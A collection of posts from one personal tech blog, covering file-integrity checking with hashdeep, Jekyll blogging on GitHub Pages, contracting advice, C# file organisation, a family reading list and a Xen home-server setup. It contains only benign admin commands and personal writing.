<p><a href="http://www.forchheimer.se/bfm/">1st Person</a> file management.<br>Didn't bother trying it, it's still funny even if it isn't true.<br>(<a href="http://slashdot.org/article.pl?sid=04/04/04/1621251">Slashdotted</a>)</p>
<file_sep>---
title: Detecting bit-rot with md5deep
layout: post
---
Thanks to [luxagen](http://luxagen.com/) for getting me to actually set something up for this. Turned out to be mighty useful when I accidentally trashed half my home folder and wanted to know if [syncthing](https://syncthing.net/) had propagated any of the damage.
The use case is slightly different to mine, but [RotKraken](https://github.com/luxagen/RotKraken) is worth a look. Its unique feature is storing file hashes in the extended attributes of the same file. This is very tidy but doesn't help me with catching unwanted deletions, hence going back to md5deep.
You'd think that running [md5deep aka hashdeep](https://github.com/jessek/hashdeep) wouldn't be worthy of a blog post, but what I found is that the primary use case for hashdeep is actually validating the integrity of an installation in order to detect rootkits etc. This is not the same as what I'm doing which is being able to spot if I've lost any files I care about in `/home/tim` through carelessness or [bit-rot](https://en.wikipedia.org/wiki/Data_degradation). It turns out that md5deep does actually have what I needed, but the way the options are described means it's not at all obvious that it would fulfill this need.
You can find [my hash and verify scripts as a gist here](https://gist.github.com/timabell/f70f34f8933b2abaf42789f8afdbd7d5)
It turns out the magic is in the "audit" section of the docs.
The terminology of the verification output is more about what it did than why you care. The important one for spotting bit-rot when verifying is `Known file not used` which means that you have a hash but you no longer have a matching file anywhere. Either you deleted it or modified it on purpose or you've just lost something you care about. Time to reach for the backups. I like [back-in-time](https://backintime.readthedocs.io/) to usb disks for backup.
## Hashing
```
hashdeep -c md5 -of -r -l Music Documents > hash_file.txt
```
<https://explainshell.com/explain?cmd=hashdeep+-c+md5+-of+-r+-l+Music+Documents>
Output:
```
%%%% HASHDEEP-1.0
%%%% size,md5,filename
## Invoked from: /home/tim
## $ hashdeep -c md5 -of -r -l Music Downloads Documents Pictures Phone Dropbox repo
##
3425,3ecc5852703f3846298b381bc2510a39,Music/checksums-verification-Music.txt
461,456e92277eaf9de695bd1229d80f059b,Music/checksums-verification-Music.txt.bak
100663,0d9d53e95e5d80fa43a64f5d02f25b1e,Music/checksums-Music.txt
794926,95c1558e7c97200140c37ffb0d12669d,Music/flac/Mordecai Smyth - Dial M For Mordecai/cover.jpg
17618302,cfb11490aacfdcbb79fd4310cf834e01,Music/flac/Mordecai Smyth - Dial M For Mordecai/Mordecai Smyth - Dial M For Mordecai - 02 Psychedelic Sarah.flac
...
```
## Verifying
```
hashdeep -k hash_file.txt -rle -of Music Documents -avv
```
<https://explainshell.com/explain?cmd=hashdeep+-k++hash_file.txt+-rle+-of+Music+Documents+-avv>
Output:
```
Documents/hashdeep-checksums-verification.txt.bak: Moved from Documents/hashdeep-checksums-verification.txt
Documents/hashdeep-checksums-verification.txt: No match
Documents/hashdeep-checksums.txt: No match
repo/rust-kata/.idea/workspace.xml: No match
repo/rust-kata/.git/logs/HEAD: No match
...
Documents/hashdeep-checksums-verification.txt.bak: Known file not used
Documents/hashdeep-checksums.txt: Known file not used
repo/rust-kata/.idea/workspace.xml: Known file not used
...
```
## Workflow
I have a monthly calendar reminder to run backups. When that goes off I:
1. Run `verify-hashes.sh` and search the output for "Known file not used" to find any rot or churn.
1. Run `rehash.sh` to update the hashes.
1. Plug a backup HDD in and run back-in-time to update the backup
1. Sleep easy.
I run one hash file for all folders. I started with one per top level folder but that meant the verify couldn't spot things moved between folders and it reported them as missing.
It would be nice to iterate on this but it's a good start.
<file_sep>---
layout: page
title: Hire Me
permalink: /hire/
redirect_from:
- /hire-me/
---
## About Charm Consulting Ltd
Charm Consulting provides ASP.NET software engineering and consulting services
on a contract basis.
## About Me (<NAME>)
I provide programming and consultancy services for clients with primarily C# /
ASP.NET MVC projects. I focus on providing quality long-term solutions to the
problems at hand, making sure the work being done is aligned with the
priorities and values of the client. I have full-stack web development
capabilities, with an emphasis on back-end systems. I can lead, mentor and can
communicate with all stakeholders.
My core values in my work are: honesty, continual learning, applying best
practices, quality, elegance, practicality, avoiding dogmatism, emergent
architecture, YAGNI, agility, customer focus, continuous process & code
improvement.
[Read more about my approach to work](/2018/03/10/my-approach-to-my-work/).
I’ve focussed on software engineering roles & projects since graduating in 2000
with a degree in Cybernetics & Control Engineering from Reading University.
I’ve had the opportunity work in organisations of all sizes which has allowed
me to gain broad knowledge and skills, from team leadership to server
administration.
As the tech industry never stands still I've recently been broadening my
skillset by adding GoLang to my existing full-stack C# / ASP.NET web
development skills. My latest side-project (written in GoLang) is
[SQL Schema Explorer](https://timabell.github.io/schema-explorer/), this has been helping me improve my marketing skills
as well as broadening my programming skills.
[](https://app.pluralsight.com/profile/timabell)
I have a broad interest in programming and business and am always doing
something beyond client work.
---
* For current availability, more information and updates <a href="https://www.linkedin.com/in/timabell/">find me on LinkedIn</a>.
* <<EMAIL>> - drop me a line to arrange a call.
* [Get notified when I’m available for contracts](http://eepurl.com/c82ZpL) - low volume mailing list.
* CV available on request
---
[](https://www.flickr.com/photos/tim_abell/26154585057/)
---
To learn about my approach to protecting against duplicate recruiter submissions see my <a href="/recruiters/">recruiters</a> page.
<file_sep>---
title: "Hulloa"
date: 2004-02-05
slashdot_url: https://slashdot.org/journal/60927/hulloa
---
<p>Gosh, it's 7 days since i wrote here.<br>I'm back to my nocturnal ways - such is the way of the geek.</p>
<p>I've joined our friendly local <a href="http://www.thamesvalleytri.f9.co.uk/">triathletes</a>, who have been teaching me to "swim", I can nearly front crawl now. This is why I've given up logging my distances for the moment, I need to get the technique sussed before I worry too much about the fitness. Having said that I believe I managed 20+ lengths (25m) on wed eve in the hour's training, mostly in front crawl which was an achievement for me. (Bear in mind I only started swimming in Nov '03.</p>
<p>right, back to attempt 4 at suse linux</p>
<p>Tim</p>
<p>ps:<br>Coz beat me in oz:<br>42 lengths of 51.5 meters in 1.5 hours</p>
<file_sep>---
title: What you should do between contracts
layout: post
redirect_from:
- /2020/04/06/what-should-you-do-between-contracts/
---
# Strange times with Covid-19
I can't post this without mentioning the context I'm writing in of the
coronavirus pandemic lock-down.
I consider myself extremely lucky to be in the line of work I am that allows me
the flexibility to continue working remotely whilst still protecting myself and
those around me by avoiding contact.
## What I normally do
In calmer times I'd have taken the opportunity to spend at least a couple of
weeks with family (have small people and time with them is preciously
fleeting). Then get my life in order, then go hell for leather getting into the
next thing I can help build.
Some of my fellow contractors like to make sure they have the next contract
lined up ready for the finish date of their current contract. While this is
optimal for revenue I don't do this because:
* I find it is a full time job generating, tracking and dealing with
contracting leads
* I wouldn't want to be distracted from the current client's work to the next
thing
* I wouldn't want to half-arse the contract hunt and not get the optimal
contract for myself and the next client.
* There is a tendency for last-minute contract extensions to appear which would
mean letting down one or other client.
So after a contract is completely finished, and some time with family, only
then do I take the contract hunt seriously.
## What I'm doing this time
Given the uncertainty caused by COVID-19 + IR35 (by the way COVID is short for
Corona Virus Disease) and the fact I just moved house (i.e. less cash reserves
than usual) I can't take it too easy this time. Even though the IR35 changes
have been delayed a year a lot of the damage has been done so the contractor
market is challenging at the moment.
I finished my contract with DfE on a Tuesday, allowed myself till the following
Monday for uninterrupted family time. (Okay almost uninterrupted, I can't
really put technology down for that long and I also have my charitable work for
[DogLost](doglost.co.uk) that takes up some time.)
Now that is over, I'm doing roughly 9am-1pm on the business related tasks
suggested below.
# What should you do to make the most of finishing a contract?
## Step 1. Take a break
Contracting is in my experience much more intense than permanent employment.
This is in fact how I like it. But in order to be able to give your all to the
next contract I think it is important to give yourself the space to recharge.
When in a contract it's easy to end up with tunnel vision, especially for one
as long as my last one (2 years!), where all you can think about is how it was
done there and how you reacted to the influences around you during that time.
One of the strengths you can bring to a contract as a contractor is the broader
perspective from seeing many organisations, approaches, technologies and
people. It requires a bit of down-time for your latest experience to sink in
once you are out of the hustle and bustle of delivery, and for it to be merged
into your bank of knowledge.
What better way to end a contract than with good chunk of time with family and
friends while your subconsious churns through and processes everything that's
happened over the last contract.
I believe if you dive headlong into the next thing with nothing more than a
normal weekend off then your brain will not have the opportunity to properly
process what you've learnt before being overwhelmed with an influx of new
information from a new client.
## Step 2. Update your online presence and CV
You've probably learned a lot and changed a bit since you started the last
contract.
Review and update all your profiles:
* LinkedIn
* Twitter (make a new pinned tweet!)
* GitHub
* StackOverflow
* etc.
Think about what your next client will be interested in and what they want help
with and make sure your profiles provide evidence that you have done similar
things before and can get results.
## Step 3. Do some writing
The best way to shape your thoughts on the whole thing is to put them into
writing. So spend some time blogging like I'm doing now, and make sure to
cross-post your articles to the places where your customers will see them. You
should own your own content, keep it on your own domain on your own blog where
no platform can take away your audience, then cross-post to places like
[dev.to](https://dev.to), LinkedIn and Medium (if that's your thing) with links
back to your own domain. Better still on your posts ask people to sign up to
your mailing list and email them when you post new articles etc.
## Step 4. Catch up with old acquaintances
It's hard when you're flat out with life and contracts to keep in touch with
everyone. Reach out to old business and personal friends. You never know it
might kick off your next opportunity, or help you learn something about
yourself that's useful.
## Step 5. Go all guns blazing on getting the next piece of work
> "You will get all you want in life if you help enough other people get what they want,"
> ~ <NAME>
Figure out who'd value your skills most even in these difficult times and have
at it.
You might find my previous article ["How to find contract developer
jobs"](https://timwise.co.uk/2019/06/26/how-to-find-contract-dev-jobs/) useful
at this point.
Personally I'm looking to also increase the value I provide beyond
implementation work. This might take the form of team lead roles, or some
digital transformation consultancy.
# ~ End ~
What do you do between contracts or how do you avoid having gaps? Are you
between contracts now thanks to IR35?
<file_sep>---
title: "Curiosity did _not_ kill the cat. That was the car >:|"
date: 2004-09-20
slashdot_url: https://slashdot.org/journal/84305/curiosity-did-not-kill-the-cat-that-was-the-car-
---
<p>This is <a href="http://slashdot.org/~mcrbids">mcrbids</a>' sig, and I want to show this to all my friends who have ever said "I'm just curious about stuff".</p>
<blockquote><div><p> <i>I have no special talents. I am only passionately curious.</i><br>--<NAME></p></div></blockquote>
<p>I knew there was nothing magic about knowledge and talent, it's all about dedication, and there's no better motivation than curiosity.</p>
<file_sep>---
layout: post
title: Setting up a static website/blog with jekyll
categories: [howto,backstage]
---
A couple of people asked me for more info on my new blog setup here's a rough
outline of what's involved in setup and posting. There are *many* ways of doing
this, this is just the way that suited me best for now.
What you need to follow along:
* A domain from [GoDaddy](https://uk.godaddy.com/)
* An account on [GitHub](https://github.com/)
# Things I like about this setup
* Built-in backups,
* offline editing,
* no shonkey web gui,
* no charge for hosting with custom domain and https,
* simple dev friendly templating,
* a nice simple code-friendly mobile-friendly design,
* full control.
* [public revision
history](https://github.com/timabell/timwise.co.uk/commits/master) of blog
posts with no extra effort (no more "updated: blah" in blog posts)
# Why jeykll fits that
A blog post like this one is just a text file in a special format called
markdown. These can then be trivially source-controlled with git, which serves
as version control and distributed backup in one neat package. I use git for
work so although it's not the easiest tool to use that's not a problem for me.
Theoretically if you don't know git you could probably just do all your editing
in the github web interface these days.
Here's the *entire* folder structure of this blog as it stands right now. You
can see there's really not a lot too it.
```
tim@fox:~/repo/timwise.co.uk(master)
$ tree
.
├── 404.md
├── about.md
├── categories.md
├── CNAME
├── _config.yml
├── _drafts
│ └── 2019-06-24-setting-up-a-jekyll-blog.md
├── favicon.ico
├── fonts
│ ├── aramisi.ttf
│ ├── EBGaramond-Regular.ttf
│ └── FuturaPTLight.otf
├── images
│ ├── 404.jpg
│ ├── reverie-demo.png
│ ├── reverie.png
│ └── reverie-text.png
├── _includes
│ ├── analytics.html
│ ├── disqus.html
│ ├── meta.html
│ └── svg-icons.html
├── index.html
├── _layouts
│ ├── default.html
│ ├── page.html
│ └── post.html
├── LICENSE
├── _posts
│ └── 2019-06-21-yet-another-new-blog.md
├── _sass
│ ├── _darcula.scss
│ ├── _highlights.scss
│ ├── _reset.scss
│ ├── _svg-icons.scss
│ └── _variables.scss
└── style.scss
7 directories, 30 files
```
The posts are just text files using the markdown format with a `.md` file extension instead of `.txt` and a short header for information like page title and tags. Here's the top of this one:
```
---
layout: post
title: Setting up a static website/blog with jekyll
categories: [howto,backstage]
---
A couple of people asked me for more info on my new blog setup here's a rough
outline of what's involved in setup and posting. There are *many* ways of doing
this, this is just the way that suited me best for now.
```
# How I set it up
I actually am reconfiguring from another setup, and used some advanced
sillyness, but I'll simplify that here down to roughly the steps you'd need to
go from cold as I'm sure that's more interesting to you.
1. Buy a domain from GoDaddy
1. Create a GitHub account
1. [Find a jekyll
theme](https://duckduckgo.com/?q=jekyll+themes&t=lm&ia=we://duckduckgo.com/?q=jekyll+themes&t=lm&ia=web)
on become a base for your new site (the themes vary on how ready they are
for you to just crack on). Here's [the reverie
theme](https://github.com/amitmerchant1990/reverie) that I used with minimal
customisation.
1. Go into the settings for your repo, 
1. turn on github pages, 
1. configure your domain name, 
1. enable https 
1. Go to GoDaddy and [set up the DNS to point to the github
servers](https://help.github.com/en/articles/using-a-custom-domain-with-github-pages)
# Blogging with Jekyll
1. Create new text file in the `_posts` folder, name it
`yyyy-mm-dd-your-post-title.md`,
1. steal the header block from above and customise it for your post,
1. write stuff
1. use markdown for layout,
1. add images by saving them to an images folder and also adding them to your
git repo, use `` to show the image in your `.md` file,
1. check everything in & `git push` to github,
1. your changes are live within seconds of pushing.
If you aren't up to the full `git` setup, you can edit your blog directly in github's web interface.
1. Creating a new post

1. Editing a post

1. Editing the text of a post

# Advanced ninja coder blogging
Part of the reason I chose this particular setup is that plain markdown blogging with github pages allows me to use my existing coder tools to blog things really fast, reducing the barrier to me actually sharing useful insights and thoughts with you all.
You can see the advanced editing flow in action here:
<https://www.youtube.com/watch?v=w3gMZTKcGKc>
<iframe width="560" height="315" src="https://www.youtube.com/embed/w3gMZTKcGKc" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
Here's the tools I use, as shown in the above video:
- [zsh](https://en.wikipedia.org/wiki/Z_shell) - allows changing directory without `cd`
- [symlinks](https://www.howtogeek.com/287014/how-to-create-and-use-symbolic-links-aka-symlinks-on-linux/) to link blog folder into `~/blog`
- [shell script `new`](https://github.com/timabell/timwise.co.uk/blob/1024d49afab27b08ef060ac2d245a37a9d8b3837/new)
- [template md file](https://github.com/timabell/timwise.co.uk/blob/1024d49afab27b08ef060ac2d245a37a9d8b3837/_drafts/template.md?plain=1)
- [jekyll](http://jekyllrb.com/)
- [github pages](https://pages.github.com/)
- [github actions](https://github.com/timabell/timwise.co.uk/actions) - automatically deploys pages (automatically set up when you enable github pages)
- [markdown](https://commonmark.org/help/) - this is important, it allows efficiently writing richly formatted blog posts with nothing but an (advanced) text editor such as vim or vscode
- [vim](https://www.vim.org/) the original text editor (see also [neovim](https://neovim.io/) that I haven't got around to using yet)
- [fzf the fuzzy finder](https://github.com/junegunn/fzf) - so I can type `**[tab]` and find any blog post easily
- [vscode](https://code.visualstudio.com/) with the [vscode vim emulator extension](https://marketplace.visualstudio.com/items?itemName=vscodevim.vim) - ctrl-p to open any post quickly
- [git](https://git-scm.com/) - provides history, and a very quick way to ship changes to the host (github) all on the command line
- I have many [command line aliases in my dotmatrix](https://github.com/timabell/dotmatrix/blob/main/.aliases) and [aliases in my gitconfig](https://github.com/timabell/dotmatrix/blob/main/.gitconfig) - these make working on the commandline (cli) muuuch faster.
- Ruby locally (advanced coder things)
- [asdf-vm](https://asdf-vm.com/) to ensure I always have the right ruby version available on any machine, or can easily install it
- [tmux](https://www.howtogeek.com/671422/how-to-use-tmux-on-linux-and-why-its-better-than-screen/) to allow me to have the server running in the background while I use the editor
⚠️ Note: ignore the `_site` folder when choosing the file to edit, that's the generated cache and will be overwritten.
# Summary
Wordpress was overcomplicated for my needs, and slower to use/read, this new setup should mean I can tap away on the train and send new thoughts your way more regularly.
# Extras
* Bonus points for MailChimp's [rss to email](https://mailchimp.com/features/rss-to-email/) which means it'll automatically hit your inbox. (I haven't manageed to make it work yet though.)
* Here's all the jekyll gems github pages allows you to add <https://github.com/github/pages-gem/blob/master/lib/github-pages/plugins.rb#L5>
<file_sep>---
layout: post
title: Ubuntu screen locking
date: '2007-07-02T21:15:00.000Z'
author: <NAME>
tags:
- howto
- ubuntu
- linux
- laptop
modified_time: '2007-07-02T21:23:01.224Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6079608926457625139
blogger_orig_url: https://timwise.blogspot.com/2007/07/ubuntu-screen-locking.html
---
Howto prevent ubuntu locking the screen when closing the laptop lid.
Thanks to jrib in irc://freenode.net/#ubuntu for this one.
* Run gconf-editor (with alt+F2)
* Go to or search for /desktop/gnome/lockdown
* Tick disable_lock_screen
* Restart gnome (ctrl+alt+backspace - after saving your documents it's a bit brutal!)
<file_sep>---
title: Single class per file
layout: post
---
Reasons you should prefer a single `class` / `interface` / `record` / `enum` / `struct` per file in C# projects.
## Congitive load
Multiple types per file increases the cognitive overhead of remembering where everything lives.
When working on a project, having to remember where each thing is hidden and how things are organised is extra mental load that can be eliminated by following the simple rule of "every class gets a file" regardless of how trivial or short they may be.
## Reduced dependence on IDE support
IDEs that can jump to a definition are not the only tool we use to inspect and navigate code.
By hiding multiple types in a file where the name doesn't match you make it harder to operate in a codebase without a full IDE.
You might be an IDE-only developer but not everyone operates that way, and you might be missing out on some other excellent tools out there.
## Git merge conflict avoidance
You are more likely to run in to merge conflicts if you put types all together in one file as multiple developers work on a project. Especially when things get moved / renamed / refactored.
## Simple refactoring
Putting multiple things in a file breaks refactoring tool flows (resharper) which assume they can rename files to match types.
## Can be applied consistently
Having multiple types per file requires you to make constant judgement calls about what goes together in one file and what is separate. Different developers will inevitably make different judgement calls.
This problem can be entirely eliminated by sticking to class-per-file.
It is impossible to come up with a concrete rule for exactly what goes together in a file and what is separate, whereas the rule of one-class-per-file is trivial to apply consistently.
## Avoid need for additional naming
If you have one class in a file you can name the file the same as the class. If you have two types in a file what do you name the file?
If you have two types in a file you now have to come up with a *third* name that covers both things, or use the name of only one of the things, which is then misleading / surprising. By having a class per file you eliminate this entirely.
## But wait, what about tiny little records
A project I was on recently made heavy use of the newer [`record`](https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/builtin-types/record) type, which is cool because they're (usually) immutable. In that project there was a coding style of lumping all related records together in one file, and I must confess that I'm happy to make the exception for tiny one-line record types that only exist as child types to a parent record, and they can go in the parent's file. As soon as they are shared between two parents at that point they have to go in their own file otherwise the structure makes no sense any more.
For example if `Pet` is only referenced through Person then I'm cool with `Tattoo` living in `Person.cs`:
```c#
public record Person(string FirstName, string LastName, Hair Hair, List<Tattoo>);
public record Hair(string Colour, int LengthCm);
public record Tattoo(string Description, bool HasColour);
```
Without accepting this nuance the result is thousands of tiny files, which ends up being harder to navigate. Use your judgement wisely.
## I hear C and Rust like huge files
I have seen in Rust at least that there's a cultural preference for "one big file" that defines a whole thing. This is interesting, but not something I'd be keen to import into C# projects which have a much stronger thing-per-file heritage and where I've seen both and far prefer the class per file style.
<file_sep>---
title: "new blog, take two"
date: 2007-03-13
slashdot_url: https://slashdot.org/journal/166369/new-blog-take-two
---
<p>ok, that was an enormous failure.</p>
<p>installed wordpress on a machine at home. got hacked (duh). spent a month working my butt off at work and haven't even looked it.<br>second attempt here: <a href="http://timwise.blogspot.com/">http://timwise.blogspot.com/</a></p>
<p>will be full of lots of fascinating open source exploits. might even start posting pretty photos with flickr.</p>
<file_sep>---
title: A book list for my children
layout: post
---
This is for my children when they're old enough to read them and benefit from them, and when they decide to take an interest in the advice of their boring old man, however I'd recommend this list to anyone no matter their stage in life.
What book should you read next? Well, what problem are you trying to solve right now? That said, there are some eternal problems in life such as interpersonal relationships and the search for financial stability and fulfilment which these books help navigate.
I've added a note to each explaining why you should read it, and when you might want to make it a priority. I've also put them in an order that I think would be sensible; with the most foundational first (personal growth) followed by more wealth and lifestyle focussed volumes.
## Being human
1. [The 7 habits of highly effective people; <NAME>](https://www.amazon.co.uk/Habits-Highly-Effective-People/dp/0684858398)
* Why? It's important to know you can change who you are and be a better person, and know how to do so. You can be better with relationships and those around you. This book is an inspiration in personal growth.
* When to read: as a young adult, and again when you're older and wiser. Or right now if you're already both of those.
1. [Daring Greatly by <NAME>](https://www.amazon.co.uk/Daring-Greatly-Courage-Vulnerable-Transforms-ebook/dp/B00APRW2WC)
* Why? Our society teaches all the wrong lessons around guilt, shame and vulnerability. Our default responses to that are self-destructive. Brené shows us how to be brave enough to accept the challenges of life without hurting others to protect ourselves. The difference between guilt ("I did something that was wrong and regret it") and shame ("I'm a bad person") is often misunderstood or ignored entirely. When you think clearly about this it becomes clear that guilt is good and shame is bad.
* When to read: As early as you can, and maybe again if you find yourself falling into the traps of self-shaming, shaming others or not having the courage to do hard things for fear of failure.
1. [Nonviolent Communication; <NAME>](https://www.amazon.co.uk/Nonviolent-Communication-Create-Relationships-Harmony/dp/B00TIWFAV0/)
* Why? Somewhat surprisingly perhaps the calm and empathic approach to communication is superior; but that's easier said than done with our brains evolved for times gone by.
* When to read: As soon as you argue with someone and wonder what it achieved or it cost you dearly. Ideally before that happens.
1. [Bonds That Make Us Free; <NAME>](https://www.amazon.co.uk/Bonds-That-Make-Free-Relationships/dp/B07N149VZK/)
* Why? Yes, it's another book on dealing with people. The truth is it's not them it's you; but the good new is that you have the power to change what's wrong. It turns out that dealing with people is important, and is foundational in all walks of life.
* When to read: As soon as you can, and then probably every decade after that.
1. [So good they can't ignore you; Cal Newport](https://www.amazon.co.uk/Good-They-Cant-Ignore-You/dp/0349415862/)
* Why? Don't believe the hype at work, people hire for your real skills and what you can do for them. More details and foundational career advice for any path you choose lie within.
* When to read: Probably before your first or second job, but better late than never. If you've retired rich before you read this then maybe don't bother!
1. [The Life-Changing Magic of Tidying; <NAME>](https://www.amazon.co.uk/gp/product/0091955106/)
* Why? Because too much stuff ironically makes you less happy. Go figure. A practical guide to a calming and tidy house/room/boat/mansion/office from someone a little obsessed with tidy.
* When to read: When you're fed up hearing me complain your room's a mess. Or later on when you realise why I complained about it but don't really know how to fix it.
1. [48 Laws of Power; <NAME>](https://www.amazon.co.uk/48-Laws-of-Power/dp/B00WYRC0L4/)
* Why? Sadly the world is not the cuddly, friendly, fair and equitable world some people seem to think they can wish into existence by will power and singing alone. There are plenty of good things, but the hard truths about raw underlying human nature are best understood so you can deal with them if you need to. I trust you are a good human being who will only use some of the darker knowledge in here for good and personal survival.
* When to read: I hesitate to say early because used without experience this knowledge will get you into more trouble than it gets you out of. That said, earlier the better but don't rush into using it, just observe the people around quietly with this new knowledge for the next few years at least.
## Money and work
1. [Rich dad, poor dad; <NAME>](https://www.amazon.co.uk/Rich-Dad-Poor-Teach-Middle/dp/1612680194/)
* Why? Money isn't everything, but not having it will make you miserable. And the thing that will make you poor beyond anything else is your mindset and financial education. Read this to learn what the people who never seem to work do and why they never seem to run out of money.
* When to read: As soon as your bank account hits zero for the first time, and any time you are annoyed that you still have that sucky job you hate but can't escape from (happens to us all I think).
1. [Think and Grow Rich; Napoleon Hill](https://www.audible.co.uk/pd/Think-and-Grow-Rich-Audiobook/B00O5DGGZQ)
* Why? More money will let you solve more problems, have more freedom, help more people, and live your best life. But it's not that easy to know where to start without a role model and a plan. Good practical guidance in here. Time will tell if I make good use of it myself.
* When to read: After the first few years of plying a trade perhaps, but don't leave it too long.
1. [The 4-Hour Work Week; <NAME>](https://www.amazon.co.uk/The-4-Hour-Work-Week/dp/B0065LN8DE/)
* Why? Working for someone else 9-5 isn't the only way to make a living. This book might age when it comes to tactics, but the inspirational vision of another way of life is timeless.
* When to read: Whenever you've had enough of a job. Or maybe if you just want to dream, or travel.
1. [The Road Less Stupid; <NAME>](https://www.amazon.co.uk/The-Road-Less-Stupid/dp/B07DJY4RSQ/)
* Why? Whatever money and success you achieve, it's very easy to throw it all away again by doing dumb things that seemed like a good idea. This is a straight-talking guide to not doing that. Contains important lesson about protecting against downside risk (i.e. a small chance you lose everything) when chasing upside risk (i.e. a chance to be much richer etc). Unmitigated downside risk has the power to destroy everything you've worked for.
* When to read: Sooner rather than later, especially if you're feeling a bit ambitious.
## The meaning of life, evolution and religion
1. [The Blind Watchmaker; <NAME>](https://www.amazon.co.uk/gp/product/0141026162/)
* Why? Evolution if often poorly understood. As the foundation of our existence and behaviours this to me is a must read to truly understand life. For me it answers the question of "what is the point in life"; ironically there is no point really, but that is more freeing than some deity with odd morals. Just know that you can know the raw mechanics and still live a full, happy and meaningful life; helping all those around you.
* When to read: Whenever you have some time. Kinda background knowledge for life.
1. [The God Delusion; <NAME>](https://www.amazon.co.uk/gp/product/0593055489/)
* Why? God is all around us in the many people's of the world. His name(s) are often used to manipulate and exploit, and play power games. You and I can probably do nothing about this (and it's dangerous territory to tread in, I'm surprised Dawkins is still alive), however I think the knowledge is an important piece of the complex puzzle that is humanity. Once you've read this, don't judge those who believe for whatever reason, you will not change them and you will only cause hurt.
* When to read: Whenever you have time, any time you are considering the meaning and truth of religion, and any time you want to be able to discuss the topic with more useful information.
## Children of your own
1. [Pregnancy For Men](https://www.amazon.co.uk/Pregnancy-Men-whole-months-PAPERBACK-ebook/dp/B088PHPKRK)
* Why? Nothing can prepare you for this experience, and men are an anxious side-show. This book helped me cope, and even occasionally be useful.
* When to read: As soon as you think you'll have a kid on the way, don't leave it till the due date or you'll miss the pre-natal stuff.
1. [How to talk so Kids Will listen](https://www.amazon.co.uk/Talk-Collection-Books-talk-listen/dp/9526533585)
* Why? Nothing about communicating well is natural or obvious. It takes work and understanding, and undoing cultural failings. This series is one of the best, kindest works out there, and helped me immensely.
* When to read: When your kids are starting to talk.
1. [Hold on to Your Kids: Why Parents Need to Matter More Than Peers](https://www.amazon.co.uk/Hold-Your-Kids-Parents-Matter-ebook/dp/B07DK2CZ2V)
* Why? Culture is teaching us to ignore our parents with devastating consequences for all involved. It turns out "attachment" is the key, and when it goes wrong nothing you do will work.
* When to read: When your kids are 4+ years old.
---
Personally I like the audiobook format, and at time of writing a yearly subscription to Audible was good value for getting easy access to the content, and a narration from the author or a good speaker makes for a more memorable experience.
Beyond this list, check the best-seller lists for whatever subject you wish to excel at. There's no point learning the hard way when you can learn from someone who has. Even in this digital age books still pack a tremendous punch; the result of someone pouring 20+ years of their experience into something you can read in a week is like liquid gold. I also have recorded a lot of [my personal reading list on GoodReads](https://www.goodreads.com/user/show/50628592-tim-abell).
To my little people who will soon be bigger than me in every way, love you 💕️👊️, Diddy x
P.S. If you're reading this and you're not my kid, well I love you too for being the lovely human I know you are.
<file_sep>---
title: "woo!"
date: 2004-10-17
slashdot_url: https://slashdot.org/journal/87160/woo
---
<p>b3ta postage.<br><a href="http://www.b3ta.com/board/3836198">http://www.b3ta.com/board/3836198</a></p>
<p><nobr> </nobr>:D</p>
<file_sep>---
title: New podcast episodes - rust meetups and fast talkers
layout: post
---
If you're a podcast lover and interested in tech you might be interested in the two new episodes I've published this week
## Rust Workshop
- [Rust meetups and DevOps pipelines with end-to-end testing for confident fast shipping](https://share.transistor.fm/s/f4dbb201)
## Software Should Be Free
- [Beware "Fast Talkers" and "Pattern Obsessives" - evolve your architecture](https://share.transistor.fm/s/e4e48a64)
---
<iframe width="100%" height="180" frameborder="no" scrolling="no" seamless src="https://share.transistor.fm/e/e4e48a64"></iframe>
<iframe width="100%" height="180" frameborder="no" scrolling="no" seamless src="https://share.transistor.fm/e/f4dbb201"></iframe>
<file_sep>---
layout: post
title: tim; now available with flickr pics
date: '2007-03-23T22:21:00.000Z'
author: <NAME>
tags:
- flickr photos
modified_time: '2007-03-23T23:37:22.215Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7110396020145859598
blogger_orig_url: https://timwise.blogspot.com/2007/03/tim-now-available-with-flickr-pics.html
---
[me on flickr](http://www.flickr.com/photos/7463254%40N02/)
I've now started putting pretty photos up on flickr.
here's my first pic:

<file_sep>---
layout: post
title: New home server with Xen and docker
date: 2017-03-10 00:03:48.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/03/10/new-home-server-with-xen-and-docker/"
---
## No cloud mkay?
Going against the current received wisdom I personally am not keen to trade the convenience of the public cloud sync services such as dropbox, onedrive, google drive etc for the fact that this means that all my files traverse the public internet and live on someone else's metal. Sure it might be encrypted, but what if my traffic is intercepted and stored, and then that encryption is later found to be flawed?
I'm probably just as likely to get pwned running my own setup, but hey at least I get to learn something along the way.
Another thought is that regardless of location - home, office, cloud, vps host or data centre - it's all just (server) software. So why shouldn't we be able to get the amazing seamless experience when self hosting? It seems to me that it comes down to economics. Cloud hosting gives an opportunity for charging directly or worse using underhand tactics like owning your data or selling you as a product to advertisers. This means there is more funding for cloud systems, and therefore more developers are working on it. Even ethically minded software developers have to eat and live somewhere. I think just like Linux vs Windows we will get a perfectly good open source solution, but it will likely lag behind.
## Disk encryption
I have a new machine to use as a server so have an opportunity for a fresh approach. I want my server encrypted at rest in case the whole machine gets stolen from the house to keep the scoundrels from having easy access to all my files.
The previous machine I installed with encrypted LVM as available with Ubuntu server's installer; but this means going to the machine to unlock it after every reboot / power failure / kernel upgrade. I did have [remote unlock via dropbear ssh](http://blog.nguyenvq.com/blog/2011/09/13/remote-unlocking-luks-encrypted-lvm-using-dropbear-ssh-in-ubuntu/) set up but it's hacky to set up and non-trivial to use.
This time I've gone for a different approach:
* An unencrypted install of ubuntu server (DomU) with an ssh server, so no password required to boot up, which does nothing more than give access to:
* A Xen VM install of Ubuntu server (Dom1), this one with LVM disk encryption. This is where all my files etc will live. Installed with [virt-manager](https://virt-manager.org/), which is a very convenient UI for initial setup.
So now after a reboot I can `ssh -X` into the DomU server, then using virt-manager I can see the Dom1 VM waiting for the disk encryption key and provide the passphrase.
## Xen
[Setup instructions for xen on Ubuntu](https://help.ubuntu.com/community/Xen#Installing_Xen).
